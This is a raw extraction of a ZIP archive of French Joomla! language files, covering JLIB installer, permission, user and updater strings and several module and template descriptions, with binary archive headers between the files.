JLIB_INSTALLER_FAILED_TO_PURGE_UPDATES="Impossible d'effacer les mises à jour"
JLIB_INSTALLER_DEFAULT_STYLE="%s - Par défaut"
JLIB_INSTALLER_DISCOVER="Découvrir"
JLIB_INSTALLER_ERROR_CANNOT_UNINSTALL_CHILD_OF_PACKAGE="L'extension %s fait partie d'un paquet qui n'autorise pas la désinstallation d'extensions individuelles."
JLIB_INSTALLER_ERROR_COMP_DISCOVER_STORE_DETAILS="Installation de découverte d'un composant&#160;: échec de l'enregistrement des détails du composant"
JLIB_INSTALLER_ERROR_COMP_FAILED_TO_CREATE_DIRECTORY="Composant %1$s&#160;: impossible de créer le répertoire&#160;: %2$s."
JLIB_INSTALLER_ERROR_COMP_INSTALL_ADMIN_ELEMENT="Installation d'un composant&#160;: le fichier XML ne contenait pas d'élément d'administration."
JLIB_INSTALLER_ERROR_COMP_INSTALL_DIR_ADMIN="Installation d'un composant&#160;: un autre composant utilise déjà le répertoire %s"
JLIB_INSTALLER_ERROR_COMP_INSTALL_DIR_SITE="Installation d'un composant&#160;: un autre composant utilise déjà le répertoire %s"
JLIB_INSTALLER_ERROR_COMP_INSTALL_FAILED_TO_CREATE_DIRECTORY_ADMIN="Installation d'un composant&#160;: échec de la création du répertoire administration %s"
JLIB_INSTALLER_ERROR_COMP_INSTALL_FAILED_TO_CREATE_DIRECTORY_SITE="Installation d'un composant&#160;: échec de la création du répertoire site %s"
JLIB_INSTALLER_ERROR_COMP_REFRESH_MANIFEST_CACHE="Actualisation du cache du fichier manifest du composant&#160;: échec de l'enregistrement des détails du composant"
JLIB_INSTALLER_ERROR_COMP_REMOVING_ADMIN_MENUS_FAILED="Impossible de supprimer les menus d'administration."
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_CUSTOM="Désinstallation d'un composant&#160;: échec du script de désinstallation personnalisée"
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_FAILED_DELETE_CATEGORIES="Désinstallation d'un composant&#160;: impossible de supprimer les catégories du composant."
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_ERRORREMOVEMANUALLY="Désinstallation d'un composant&#160;: désinstallation impossible. Veuillez le supprimer manuellement"
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_ERRORUNKOWNEXTENSION="Désinstallation d'un composant&#160;: extension inconnue"
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_FAILED_REMOVE_DIRECTORY_ADMIN="Désinstallation d'un composant&#160;: impossible de supprimer le répertoire administration du composant"
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_FAILED_REMOVE_DIRECTORY_SITE="Désinstallation d'un composant&#160;: impossible de supprimer le répertoire site du composant"
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_NO_OPTION="Désinstallation d'un composant&#160;: champ d'option vide, impossible de supprimer les fichiers"
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_SQL_ERROR="Désinstallation d'un composant&#160;: erreur SQL dans le fichier %s"
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_WARNCORECOMPONENT="Désinstallation d'un composant&#160;: tentative de désinstallation d'un composant principal"
JLIB_INSTALLER_ERROR_COMP_UPDATE_FAILED_TO_CREATE_DIRECTORY_ADMIN="Mise à jour d'un composant&#160;: échec de la création du répertoire d'administration %s"
JLIB_INSTALLER_ERROR_COMP_UPDATE_FAILED_TO_CREATE_DIRECTORY_SITE="Mise à jour d'un composant&#160;: échec de la création du répertoire du site %s"
JLIB_INSTALLER_ERROR_CREATE_DIRECTORY="JInstaller: :Install: échec de la création du répertoire %s"
JLIB_INSTALLER_ERROR_CREATE_FOLDER_FAILED="Échec de création du répertoire [%s]"
JLIB_INSTALLER_ERROR_DEPRECATED_FORMAT="Format d'installation déprécié (client='both'), utilisez l'installateur de paquets à l'avenir"
JLIB_INSTALLER_ERROR_DISCOVER_INSTALL_UNSUPPORTED="Une extension de type %s ne peut être installée par la méthode 'Découvrir'. Merci d'installer cette extension depuis le Gestionnaire d'extensions -> Installer."
JLIB_INSTALLER_ERROR_DOWNGRADE="Désolé ! Vous ne pouvez pas passer de la version inférieure %s à %s"
JLIB_INSTALLER_ERROR_DOWNLOAD_SERVER_CONNECT="Erreur de connexion au serveur %s"
JLIB_INSTALLER_ERROR_FAIL_COPY_FILE="JInstaller: :Install: échec de la copie du fichier %1$s vers %2$s"
JLIB_INSTALLER_ERROR_FAIL_COPY_FOLDER="JInstaller: :Install: échec de la copie du répertoire %1$s vers %2$s"
JLIB_INSTALLER_ERROR_FAILED_READING_NETWORK_RESOURCES="Échec de lecture de la ressource réseau %s"
JLIB_INSTALLER_ERROR_FILE_EXISTS="JInstaller: :Install: le fichier existe déjà %s"
JLIB_INSTALLER_ERROR_FILE_FOLDER="Erreur d'effacement du fichier ou répertoire %s"
JLIB_INSTALLER_ERROR_FILE_UNINSTALL_INVALID_MANIFEST="Désinstallation de fichiers&#160;: fichier manifest invalide"
JLIB_INSTALLER_ERROR_FILE_UNINSTALL_INVALID_NOTFOUND_MANIFEST="Désinstallation de fichiers&#160;: fichier manifest invalide ou introuvable."
JLIB_INSTALLER_ERROR_FILE_UNINSTALL_LOAD_ENTRY="Désinstallation de fichiers&#160;: impossible de charger l'entrée de l'extension"
JLIB_INSTALLER_ERROR_FILE_UNINSTALL_LOAD_MANIFEST="Désinstallation de fichiers&#160;: impossible de charger le fichier manifest"
JLIB_INSTALLER_ERROR_FILE_UNINSTALL_SQL_ERROR="Désinstallation de fichiers&#160;: erreur SQL dans le fichier %s"
JLIB_INSTALLER_ERROR_FILE_UNINSTALL_WARNCOREFILE="Désinstallation de fichiers&#160;: Tentative de désinstallation de fichiers core."
JLIB_INSTALLER_ERROR_FOLDER_IN_USE="Une autre extension utilise déjà le répertoire [%s]"
JLIB_INSTALLER_ERROR_LANG_DISCOVER_STORE_DETAILS="Installation de découverte d'une langue&#160;: échec de l'enregistrement des détails de la langue"
JLIB_INSTALLER_ERROR_LANG_UNINSTALL_DEFAULT="Cette langue ne peut être désinstallée tant qu'elle est définie comme langue par défaut."
JLIB_INSTALLER_ERROR_LANG_UNINSTALL_DIRECTORY="Désinstallation d'une langue&#160;: impossible de supprimer le répertoire de langue spécifié."
JLIB_INSTALLER_ERROR_LANG_UNINSTALL_ELEMENT_EMPTY="Désinstallation d'une langue&#160;: l'élément est vide, impossible de désinstaller les fichiers"
JLIB_INSTALLER_ERROR_LANG_UNINSTALL_PATH_EMPTY="Désinstallation d'une langue&#160;: le chemin de la langue est vide, impossible de désinstaller les fichiers"
JLIB_INSTALLER_ERROR_LANG_UNINSTALL_PROTECTED="Cette langue ne peut être désinstallée. Elle est protégée dans la base de données (habituellement en-GB)"
JLIB_INSTALLER_ERROR_LIB_DISCOVER_STORE_DETAILS="Installation de découverte d'une librairie&#160;: échec de l'enregistrement des détails de la librairie"
JLIB_INSTALLER_ERROR_LIB_REFRESH_MANIFEST_CACHE="Rafraichissement du cache de manifeste de bibliothèque : Impossible de stocker les détails de la librairie."
JLIB_INSTALLER_ERROR_LIB_UNINSTALL_INVALID_MANIFEST="Désinstallation d'une librairie&#160;: fichier manifest invalide"
JLIB_INSTALLER_ERROR_LIB_UNINSTALL_INVALID_NOTFOUND_MANIFEST="Désinstallation d'une librairie&#160;: fichier manifest invalide ou introuvable."
JLIB_INSTALLER_ERROR_LIB_UNINSTALL_LOAD_MANIFEST="Désinstallation d'une librairie&#160;: impossible de charger le fichier manifest"
JLIB_INSTALLER_ERROR_LIB_UNINSTALL_WARNCORELIBRARY="Désinstallation d'une librairie&#160;: tentative de désinstallation d'une librairie principale"
JLIB_INSTALLER_ERROR_LOAD_XML="JInstaller: :Install: échec du chargement du fichier XML %s"
JLIB_INSTALLER_ERROR_MOD_DISCOVER_STORE_DETAILS="Installation de découverte d'un module&#160;: échec de l'enregistrement des détails du module"
JLIB_INSTALLER_ERROR_MOD_REFRESH_MANIFEST_CACHE="Actualisation du cache du fichier manifest du module&#160;: échec de l'enregistrement des détails du module"
JLIB_INSTALLER_ERROR_MOD_UNINSTALL_ERRORUNKOWNEXTENSION="Désinstallation d'un module&#160;: extension inconnue"
JLIB_INSTALLER_ERROR_MOD_UNINSTALL_EXCEPTION="Désinstallation d'un module&#160;: %s"
JLIB_INSTALLER_ERROR_MOD_UNINSTALL_INVALID_NOTFOUND_MANIFEST="Désinstallation d'un module&#160;: fichier manifest invalide ou introuvable."
JLIB_INSTALLER_ERROR_MOD_UNINSTALL_SQL_ERROR="Désinstallation d'un module&#160;: erreur SQL dans le fichier %s"
JLIB_INSTALLER_ERROR_MOD_UNINSTALL_WARNCOREMODULE="Désinstallation d'un module&#160;: tentative de désinstallation du module principal %s"
JLIB_INSTALLER_ERROR_NO_CORE_LANGUAGE="Il n'existe aucun paquet principal pour la langue [%s]"
JLIB_INSTALLER_ERROR_NO_FILE="JInstaller: :Install: le fichier n'existe pas %s"
JLIB_INSTALLER_ERROR_NO_LANGUAGE_TAG="Le paquet ne spécifiait pas de balise de langue. Essayez-vous d'installer un ancien paquet de langue ?"
JLIB_INSTALLER_ERROR_NOTFINDJOOMLAXMLSETUPFILE="JInstaller: :Install: impossible de trouver un fichier d'initialisation XML Joomla!"
JLIB_INSTALLER_ERROR_NOTFINDXMLSETUPFILE="JInstaller: :Install: impossible de trouver un fichier d'initialisation XML"
JLIB_INSTALLER_ERROR_PACK_REFRESH_MANIFEST_CACHE="Rafraichissement du cache de manifeste de paquet : Impossible de stocker les détails du paquet."
JLIB_INSTALLER_ERROR_PACK_SETTING_PACKAGE_ID="Impossible d'enregistrer l'ID du paquet pour les extensiosn de ce paquet."
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_INVALID_MANIFEST="Désinstallation de paquet&#160;: fichier manifest invalide"
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_INVALID_NOTFOUND_MANIFEST="Désinstallation de paquet&#160;: fichier manifest invalide ou introuvable %s"
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_LOAD_MANIFEST="Désinstallation de paquet&#160;: impossible de charger le fichier manifest"
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_MANIFEST_NOT_REMOVED="Désinstallation de paquet&#160;: des erreurs ont été détectées, fichier manifest non supprimé."
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_MISSINGMANIFEST="Désinstallation de paquet&#160;: fichier manifest manquant"
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_NOT_PROPER="Désinstallation de paquet&#160;: cette extension a peut-être déjà été désinstallée ou n'a pas été installée correctement&#160;: %s"
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_WARNCOREPACK="Désinstallation de paquet&#160;: Tentative de désinstallation de paquets core"
JLIB_INSTALLER_ERROR_PLG_DISCOVER_STORE_DETAILS="Installation de découverte d'un plug-in&#160;: échec de l'enregistrement des détails du plug-in"
JLIB_INSTALLER_ERROR_PLG_REFRESH_MANIFEST_CACHE="Actualisation du cache du fichier manifest du plug-in&#160;: échec de l'enregistrement des détails du plug-in"
JLIB_INSTALLER_ERROR_PLG_UNINSTALL_ERRORUNKOWNEXTENSION="Désinstallation de plug-in&#160;: extension inconnue"
JLIB_INSTALLER_ERROR_PLG_UNINSTALL_FOLDER_FIELD_EMPTY="Désinstallation de plug-in&#160;: champ répertoire vide, impossible de supprimer les fichiers"
JLIB_INSTALLER_ERROR_PLG_UNINSTALL_INVALID_MANIFEST="Désinstallation de plug-in&#160;: fichier manifest invalide"
JLIB_INSTALLER_ERROR_PLG_UNINSTALL_INVALID_NOTFOUND_MANIFEST="Désinstallation de plug-in&#160;: fichier manifest invalide ou introuvable."
JLIB_INSTALLER_ERROR_PLG_UNINSTALL_LOAD_MANIFEST="Désinstallation de plug-in&#160;: impossible de charger le fichier manifest"
JLIB_INSTALLER_ERROR_PLG_UNINSTALL_WARNCOREPLUGIN="Désinstallation de plug-in&#160;: tentative de désinstallation du plug-in principal %s"
JLIB_INSTALLER_ERROR_SQL_ERROR="JInstaller: :Install: erreur SQL %s"
JLIB_INSTALLER_ERROR_SQL_FILENOTFOUND="JInstaller: :Install: fichier SQL introuvable %s"
JLIB_INSTALLER_ERROR_SQL_READBUFFER="JInstaller: :Install: erreur de lecture du tampon du fichier SQL"
JLIB_INSTALLER_ERROR_TPL_DISCOVER_STORE_DETAILS="Installation d'un template : échec de l'enregistrement des détails du template"
JLIB_INSTALLER_ERROR_TPL_REFRESH_MANIFEST_CACHE="Rafraichissement du cache de manifeste de template : Impossible de stocker les détails du template."
JLIB_INSTALLER_ERROR_TPL_UNINSTALL_ERRORUNKOWNEXTENSION="Désinstallation d'un template : extension inconnue"
JLIB_INSTALLER_ERROR_TPL_UNINSTALL_INVALID_CLIENT="Désinstallation d'un template : client invalide."
JLIB_INSTALLER_ERROR_TPL_UNINSTALL_INVALID_NOTFOUND_MANIFEST="Désinstallation d'un template : fichier manifest invalide ou introuvable.."
JLIB_INSTALLER_ERROR_TPL_UNINSTALL_TEMPLATE_DEFAULT="Désinstallation d'un template : impossible de supprimer le template par défaut."
JLIB_INSTALLER_ERROR_TPL_UNINSTALL_TEMPLATE_DIRECTORY="Désinstallation d'un template : le répertoire n'existe pas, suppression des fichiers impossible"
JLIB_INSTALLER_ERROR_TPL_UNINSTALL_TEMPLATE_ID_EMPTY="Désinstallation d'un template : l'ID du template est vide, impossible de désinstaller les fichiers"
JLIB_INSTALLER_ERROR_TPL_UNINSTALL_WARNCORETEMPLATE="Désinstallation d'un template : tentative de désinstallation du template principal %s"
JLIB_INSTALLER_ERROR_UNKNOWN_CLIENT_TYPE="Type de client inconnu [%s]"
JLIB_INSTALLER_FILE_ERROR_MOVE="Erreur de déplacement du fichier %s"
JLIB_INSTALLER_INCORRECT_SEQUENCE="Le retour de la version %1$s à la version %2$s n'est pas autorisé."
JLIB_INSTALLER_INSTALL="Installer"
JLIB_INSTALLER_MINIMUM_JOOMLA="Vous ne disposez pas des exigences minimales de version Joomla pour J%s"
JLIB_INSTALLER_MINIMUM_PHP="Votre serveur ne dispose pas de la version de PHP minimale requise %s"
JLIB_INSTALLER_NOTICE_LANG_RESET_USERS="Langue par défaut de %d utilisateurs"
JLIB_INSTALLER_NOTICE_LANG_RESET_USERS_1="Langue par défaut de %d utilisateur"
JLIB_INSTALLER_UNINSTALL="Désinstaller"
JLIB_INSTALLER_UPDATE="Mettre à jour"
JLIB_INSTALLER_ERROR_EXTENSION_INVALID_CLIENT_IDENTIFIER="Identificateur de client invalide dans le fichier manifest de l'extension."
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_UNKNOWN_EXTENSION="Tentative de désinstallation d'une extension inconnue du paquet. Cette extension a pu être supprimée antérieurement."
JLIB_INSTALLER_NOT_ERROR="Si l'erreur ci-dessus concerne l'installation de fichiers de langue pour TinyMce, elle n'a pas d'effet sur l'installation de(s) langue(s). Certains paquets de langue créés avant la version 3.2.0 de Joomla! peuvent aussi tenter d'installer des fichiers de langue TinyMce. Comme ceux-ci sont dorévanant inclus dans le noyau, ils n'ont plus besoin d'être installés."
JLIB_INSTALLER_UPDATE_LOG_QUERY="Requête lancée à partir du fichier %1$s. Texte de la requête: %2$s."
JLIB_INSTALLER_WARNING_UNABLE_TO_INSTALL_CONTENT_LANGUAGE="Impossible de créer une langue de contenu pour la langue %s&nbsp;: %s"

JLIB_JS_AJAX_ERROR_CONNECTION_ABORT="Une interruption de connexion est survenue lors de la récupération des données JSON."
JLIB_JS_AJAX_ERROR_NO_CONTENT="Aucun contenu n'a été retourné."
JLIB_JS_AJAX_ERROR_OTHER="Une erreur est survenue lors de la récupération des données JSON : code de statut HTTP %s ."
JLIB_JS_AJAX_ERROR_PARSE="Une erreur d'analyse est survenue lors du traitement des données JSON suivantes :<br/><code style=\"color:inherit;white-space:pre-wrap;padding:0;margin:0;border:0;background:inherit;\">%s</code>"
JLIB_JS_AJAX_ERROR_TIMEOUT="Une erreur de délai d'attente (timeout) est survenue lors de la récupération des données JSON."

JLIB_LANGUAGE_ERROR_CANNOT_LOAD_METAFILE="Impossible de charger le fichier XML de langue %s de %s."
JLIB_LANGUAGE_ERROR_CANNOT_LOAD_METADATA="Impossible de charger les metadata %s de %s."

JLIB_LOGIN_AUTHORISATION="Votre accès a été autorisé."
JLIB_LOGIN_DENIED="Votre accès a été refusé."
JLIB_LOGIN_EXPIRED="Votre authentification a expiré."

JLIB_MAIL_FUNCTION_DISABLED="La fonction mail() a été désactivée et le e-mail ne peut être envoyé."
JLIB_MAIL_FUNCTION_OFFLINE="La fonction mail() a été désactivée par un administrateur."
JLIB_MAIL_INVALID_EMAIL_SENDER="JMail:: adresse d'expédition invalide %s, JMail::setSender(%s)."

JLIB_MEDIA_ERROR_UPLOAD_INPUT="Impossible de transférer le fichier."
JLIB_MEDIA_ERROR_WARNFILENAME="Le nom du fichier ne doit contenir que des caractères alphanumériques et pas d'espaces."
JLIB_MEDIA_ERROR_WARNFILETOOLARGE="Ce fichier est trop lourd pour être transféré."
JLIB_MEDIA_ERROR_WARNFILETYPE="Ce type de fichier n'est pas autorisé."
JLIB_MEDIA_ERROR_WARNIEXSS="Découverte d'une possible attaque IE XSS."
JLIB_MEDIA_ERROR_WARNINVALID_IMG="Image non valide."
JLIB_MEDIA_ERROR_WARNINVALID_MIME="Invalide type de mime "
JLIB_MEDIA_ERROR_WARNINVALID_MIMETYPE="Illégal type de mime détecté : %s"
JLIB_MEDIA_ERROR_WARNNOTADMIN="Le fichier à transférer n'est pas un fichier image et vous n'avez pas l'autorisation nécessaire."

JLIB_MENUS_PRESET_JOOMLA="Préréglage - Joomla"
JLIB_MENUS_PRESET_MODERN="Préréglage - Moderne"

JLIB_NO_EDITOR_PLUGIN_PUBLISHED="Impossible d'afficher un éditeur car aucun plug-in d'éditeur n'est activé."

JLIB_PLUGIN_ERROR_LOADING_PLUGINS="Erreur de chargement de plug-ins&#160;: %s"
JLIB_REGISTRY_EXCEPTION_LOAD_FORMAT_CLASS="Impossible de charger la classe format"

JLIB_RULES_ACTION="Action"
JLIB_RULES_ALLOWED="Autorisé"
JLIB_RULES_ALLOWED_ADMIN="Autorisé (Super Utilisateur)."
JLIB_RULES_ALLOWED_INHERITED="Autorisé (Hérité)"
JLIB_RULES_CALCULATED_SETTING="Droits appliqués"
JLIB_RULES_CONFLICT="Conflit"
JLIB_RULES_DATABASE_FAILURE="Échec de stockage des données dans la base de données.  "
JLIB_RULES_DENIED="Refusé"
JLIB_RULES_GROUP="%s"
JLIB_RULES_GROUPS="Groupes"
JLIB_RULES_INHERIT="Hériter"
JLIB_RULES_INHERITED="Hérité"
JLIB_RULES_NOT_ALLOWED="Non autorisé"
JLIB_RULES_NOT_ALLOWED_ADMIN_CONFLICT="Conflit"
JLIB_RULES_NOT_ALLOWED_DEFAULT="Non autorisé (Défaut)"
JLIB_RULES_NOT_ALLOWED_INHERITED="Non autorisé (Hérité)"
JLIB_RULES_NOT_ALLOWED_LOCKED="Non autorisé (verrouillé)."
JLIB_RULES_NOT_SET="Non défini"
JLIB_RULES_NOTICE_RECALCULATE_GROUP_PERMISSIONS="Droits du Super Utilisateur modifiés. Sauvegarder pour recharger la page afin de recalculer les droits de ce groupe."
JLIB_RULES_NOTICE_RECALCULATE_GROUP_CHILDS_PERMISSIONS="Droits modifiés pour un groupe ayant des groupes enfants. Sauvegarder pour recharger la page afin de recalculer les droits des groupes enfants."
JLIB_RULES_REQUEST_FAILURE="Échec de l'envoi des données au serveur."
JLIB_RULES_SAVE_BEFORE_CHANGE_PERMISSIONS="Merci de sauvegarder avant de changer les permissions."
JLIB_RULES_SELECT_ALLOW_DENY_GROUP="Autoriser ou refuser l'action %s aux utilisateurs du groupe %s"
JLIB_RULES_SELECT_SETTING="Modifier un droit"
JLIB_RULES_SETTING_NOTES="Les modifications des droits s'appliqueront à ce groupe ainsi qu'aux groupes enfants, composants et contenus.<br /><em><strong>Refusé</strong></em> l'emporte sur tout droit hérité, ainsi que tout droit d'un groupe enfant, composant ou contenu ; s'il y a conflit, <em><strong>Refusé</strong></em> est appliqué.<br /><em><strong>Non défini</strong></em> est équivalent à <em><strong>Refusé</strong></em> mais peut être modifié dans les groupes enfants, composants et contenus."
JLIB_RULES_SETTING_NOTES_ITEM="Les modifications des droits s'appliqueront à cet élément. Noter que :<br /><em><strong>Hérité</strong></em> signifie que les droits globaux, groupe parent et catégorie seront utilisés.<br /><em><strong>Refusé</strong></em> signifie que quels que soient les droits globaux, ceux du groupe parent ou de la catégorie, le groupe concerné ne pourra utiliser cette action pour cet élément.<br /><em><strong>Autorisé</strong></em> signifie que le groupe concerné pourra utiliser cette action pour cet élément (mais s'il y a conflit avec les droits globaux, le groupe parent ou la catégorie, ceci n'aura pas d'impact). Un conflit sera indiqué par <em><strong>Non autorisé (Hérité)</strong></em> dans la colonne 'Droits appliqués'."
JLIB_RULES_SETTINGS_DESC="Paramètres des droits pour ce groupe d'utilisateurs (voir les notes au bas)."

JLIB_STEMMER_INVALID_STEMMER="Type de langue source invalide %s"

JLIB_UNKNOWN="Inconnu"
JLIB_UPDATER_ERROR_COLLECTION_FOPEN="Le paramètre PHP allow_url_fopen est désactivé. Il doit être activé pour que la mise à jour fonctionne."
JLIB_UPDATER_ERROR_COLLECTION_OPEN_URL="Mise à jour::Collection : impossible d'ouvrir %s"
JLIB_UPDATER_ERROR_COLLECTION_PARSE_URL="Mise à jour::Collection : impossible d'analyser %s"
JLIB_UPDATER_ERROR_EXTENSION_OPEN_URL="Mise à jour::Extension : impossible d'ouvrir %s"
JLIB_UPDATER_ERROR_EXTENSION_PARSE_URL="Mise à jour::Extension : impossible d'analyser %s"
JLIB_UPDATER_ERROR_OPEN_UPDATE_SITE="Mise à jour&#160;: Impossible d'ouvrir le site de mise à jour avec l'ID %d, &quot;%s&quot;, URL&#160;: %s"
JLIB_USER_ERROR_AUTHENTICATION_FAILED_LOAD_PLUGIN="JAuthentication::authenticate : échec du chargement du plug-in %s"
JLIB_USER_ERROR_AUTHENTICATION_LIBRARIES="JAuthentication: :__construct : impossible de charger les librairies d'authentification."
JLIB_USER_ERROR_BIND_ARRAY="Impossible de lier le tableau à l'objet utilisateur"
JLIB_USER_ERROR_CANNOT_CHANGE_SUPER_USER="Un utilisateur n'est pas autorisé à changer les droits d'un groupe Super Utilisateur."
JLIB_USER_ERROR_CANNOT_CHANGE_OWN_GROUPS="Un utilisateur n'est pas autorisé à changer les droits de ses propres groupes."
JLIB_USER_ERROR_CANNOT_CHANGE_OWN_PARENT_GROUPS="Un utilisateur n'est pas autorisé à changer les droits des groupes parents de ses propres groupes."
JLIB_USER_ERROR_CANNOT_DEMOTE_SELF="Vous ne pouvez pas supprimer vos propres droits de Super Utilisateur"
JLIB_USER_ERROR_CANNOT_REUSE_PASSWORD="Vous ne pouvez pas réutiliser votre mot de passe actuel, saisissez un nouveau mot de passe."
JLIB_USER_ERROR_ID_NOT_EXISTS="JUser::_load : l'utilisateur %s n'existe pas"
JLIB_USER_ERROR_NOT_SUPERADMIN="Seuls les membres possédant des droits de Super Utilisateur peuvent modifier les comptes des autres Super Utilisateurs."
JLIB_USER_ERROR_PASSWORD_NOT_MATCH="Les mots de passe ne correspondent pas. Veuillez ressaisir le mot de passe."
JLIB_USER_ERROR_UNABLE_TO_FIND_USER="Impossible de trouver un utilisateur avec la chaîne d'activation donnée"
JLIB_USER_ERROR_UNABLE_TO_LOAD_USER="JUser::_load : impossible de charger l'utilisateur ayant l'ID %s"
JLIB_USER_EXCEPTION_ACCESS_USERGROUP_INVALID="Le groupe d'utilisateurs n'existe pas"
JLIB_UTIL_ERROR_APP_INSTANTIATION="Erreur de lancement de l'application"
JLIB_UTIL_ERROR_CONNECT_DATABASE="JDatabase::getInstance : connexion à la base de données impossible <br />joomla.library : %1$s - %2$s"
JLIB_UTIL_ERROR_DOMIT="DommitDocument est déprécié. Utilisez DomDocument à la place"
JLIB_UTIL_ERROR_LOADING_FEED_DATA="Échec du chargement des données du flux"
JLIB_UTIL_ERROR_XML_LOAD="Échec du chargement du fichier XML"

[New Strings]

JLIB_INSTALLER_DISCOVER_INSTALL="Installation par découverte"
PK!{��	��fr-FR/fr-FR.tpl_beez3.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


TPL_BEEZ3_POSITION_DEBUG="Débogage"
TPL_BEEZ3_POSITION_POSITION-0="Recherche"
TPL_BEEZ3_POSITION_POSITION-10="Pied de page au milieu"
TPL_BEEZ3_POSITION_POSITION-11="Pied de page en bas"
TPL_BEEZ3_POSITION_POSITION-12="Milieu en haut"
TPL_BEEZ3_POSITION_POSITION-13="Non utilisé"
TPL_BEEZ3_POSITION_POSITION-14="Pied en dernier"
TPL_BEEZ3_POSITION_POSITION-15="En-tête"
TPL_BEEZ3_POSITION_POSITION-1="Haut"
TPL_BEEZ3_POSITION_POSITION-2="Fil d'Ariane"
TPL_BEEZ3_POSITION_POSITION-3="Droite en bas"
TPL_BEEZ3_POSITION_POSITION-4="Gauche au milieu"
TPL_BEEZ3_POSITION_POSITION-5="Gauche en bas"
TPL_BEEZ3_POSITION_POSITION-6="Droite en haut"
TPL_BEEZ3_POSITION_POSITION-7="Gauche en haut"
TPL_BEEZ3_POSITION_POSITION-8="Droite au milieu"
TPL_BEEZ3_POSITION_POSITION-9="Pied de page en haut"
TPL_BEEZ3_XML_DESCRIPTION="Beez3, le template au normes d'accessibilité pour Joomla! 3.x  - Version HTML 5"
PK!�
�n,,%fr-FR/fr-FR.mod_related_items.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_RELATED_ITEMS="Articles en relation"
MOD_RELATED_ITEMS_LAYOUT_DEFAULT="Défaut"
MOD_RELATED_XML_DESCRIPTION="Le module 'mod_related_items' liste les articles publiés en relation avec celui affiché. Les relations sont effectuées à l'aide des mots-clés attribués aux articles. Par exemple, un article 'Perroquets d'élevage' et un autre 'Cacatoès noir' possédant tous deux le mot-clé 'perroquet' seront considérés en relation."

PK!�)�VV'fr-FR/fr-FR.mod_articles_latest.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_ARTICLES_LATEST="Derniers articles"
MOD_LATEST_NEWS_XML_DESCRIPTION="Le module 'mod_articles_latest' affiche une liste des derniers articles créés et en cours de publication."
MOD_ARTICLES_LATEST_LAYOUT_DEFAULT="Défaut"

PK!���'��%fr-FR/fr-FR.mod_articles_news.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_ARTICLES_NEWS="Flash d'information"
MOD_ARTICLES_NEWS_XML_DESCRIPTION="Le module 'mod_articles_news' affiche un nombre défini d'introductions d'article d'une ou de plusieurs catégories. Si aucune catégorie n'est sélectionnée, toutes les catégories seront utilisées."
MOD_ARTICLES_NEWS_LAYOUT_DEFAULT="Défaut"

PK!�U�%% fr-FR/fr-FR.mod_weblinks.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_WEBLINKS="Liens web"
MOD_WEBLINKS_XML_DESCRIPTION="Le module 'mod_weblinks' affiche les liens définis dans le composant de liens web."
MOD_WEBLINKS_LAYOUT_DEFAULT="Défaut"

PK!��s�

 fr-FR/fr-FR.mod_random_image.ininu&1i�; @date        2015-09-21
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_RANDOM_IMAGE="Image aléatoire"
MOD_RANDOM_IMAGE_FIELD_FOLDER_DESC="Spécifiez le chemin relatif depuis la racine de votre site du dossier des images. Exemple : images/stories/pub"
MOD_RANDOM_IMAGE_FIELD_FOLDER_LABEL="Dossier des images"
MOD_RANDOM_IMAGE_FIELD_HEIGHT_DESC="Spécifiez la hauteur en pixels à appliquer aux images. Attention forcer une taille spécifique peut altérer la qualité des images !"
MOD_RANDOM_IMAGE_FIELD_HEIGHT_LABEL="Hauteur (px)"
MOD_RANDOM_IMAGE_FIELD_LINK_DESC="Adresse URL vers laquelle est redirigé l'utilisateur lorsqu'il clique sur l'image. Exemple : http://www.joomla.fr"
MOD_RANDOM_IMAGE_FIELD_LINK_LABEL="Lien"
MOD_RANDOM_IMAGE_FIELD_TYPE_DESC="Type de format d'image : jpg, png, gif, etc. (jpg par défaut)"
MOD_RANDOM_IMAGE_FIELD_TYPE_LABEL="Type d'image"
